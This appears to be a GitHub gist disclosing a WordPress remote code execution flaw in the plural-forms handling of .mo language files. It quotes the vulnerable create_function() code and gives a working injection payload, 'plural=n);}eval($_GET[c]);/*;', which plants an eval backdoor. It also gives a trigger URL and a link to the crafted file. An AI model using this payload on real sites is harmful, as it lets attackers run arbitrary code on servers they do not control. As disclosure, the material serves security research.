Skip to content

Instantly share code, notes, and snippets.

/.md Secret

Created October 8, 2016 13:05
Show Gist options
  • Save anonymous/908a087b95035d9fc9ca46cef4984e97 to your computer and use it in GitHub Desktop.
Save anonymous/908a087b95035d9fc9ca46cef4984e97 to your computer and use it in GitHub Desktop.
WordPress RCE via specially crafted .mo language file

WordPress RCE via specially crafted .mo language file

The vulnerability code in wp-includes/pomo/translations.php:

  function make_plural_form_function($nplurals, $expression) {
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        return create_function('$n', $func_body);
  }

PHP's create_function() function internally performs zend_eval_stringl(), so an attacker can use } close the anonymous function and execute arbitrary code in the process of creating the anonymous function :-)

PoC:

Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;

I provide crafted .mo language file, you can set default language to chinese, then access to the following URL and the phpinfo() function will be executed.

/index.php?c=phpinfo();

The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment